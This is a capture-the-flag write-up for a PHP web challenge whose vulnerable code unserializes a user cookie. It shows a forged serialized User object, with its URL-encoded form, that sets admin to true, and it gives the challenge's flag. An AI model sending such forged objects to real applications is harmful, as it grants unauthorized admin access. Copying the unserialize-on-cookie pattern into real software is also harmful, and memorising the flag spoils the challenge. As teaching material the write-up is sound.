Writeup: PEA 2019 - Educated guess

Information

  • category: Web
  • points: 600

Description

There is a secured system running at http://shell1.2019.peactf.com:1428/query.php. You have obtained the source code.

Writeup

This is the content of the source code file:

<!doctype html>
<html>
<head>
    <title>Secured System</title>
</head>
<body>
<?php

// https://www.php-fig.org/psr/psr-4/

function autoload($class)
{
    include $class . '.class.php';
}

spl_autoload_register('autoload');

if (!empty($_COOKIE['user'])) {
    $user = unserialize($_COOKIE['user']);

    if ($user->is_admin()) {
        echo file_get_contents('../flag');
    } else {
        http_response_code(403);
        echo "Permission Denied";
    }
} else {
    echo "Not logged in.";
}
?>
</body>
</html>

Filtering out the HTML and simplifying the content leaves us with this piece of code:

<?php

// https://www.php-fig.org/psr/psr-4/

function autoload($class)
{
    include $class . '.class.php';
}

spl_autoload_register('autoload');

if (!empty($_COOKIE['user'])) {
    $user = unserialize($_COOKIE['user']);

    if ($user->is_admin()) {
        echo file_get_contents('../flag');
    } else {
        http_response_code(403);
        echo "Permission Denied";
    }
} else {
    echo "Not logged in.";
}
?>

Code explanation:

  • spl_autoload_register('autoload'): registers the given function (in our case, autoload) as the __autoload() implementation, so any class name that unserialize() encounters is looked up in <classname>.class.php.
  • If the cookie called user is not empty, then $user is the object unserialized from the cookie value.
  • If $user->is_admin() returns true, the flag is echoed.

Solution:

  • In OOP, functions like is_admin() are called on objects of classes named like Profile, User, ..., so I created a simple User class (first "educated" guess)
    • Then I tried to find the class in the domain: success!
  • In OOP, functions like is_admin() usually return boolean variables declared in the class scope, so I added to the User class the boolean attribute admin set to true
  • Then serialize the object created and paste the serialized string in the user cookie
  • Something doesn't work...
    • It surely is because of this: the serialized string contains characters that are not safe in a cookie value
    • So URL-encode the serialized object
  • Get the flag :3
<?php

// Guessed class: the autoloader on the target will look for User.class.php,
// and is_admin() is assumed to return the value of this attribute.
class User {
    public $admin = true;
}

$a = new User();
$s = serialize($a);
echo $s;

?>

// Output: O:4:"User":1:{s:5:"admin";b:1;}

// URL-encoded: O%3A4%3A%22User%22%3A1%3A%7Bs%3A5%3A%22admin%22%3Bb%3A1%3B%7D

Flag

flag{peactf_follow_conventions_4022940cb27774f618aa62fe8be202bc}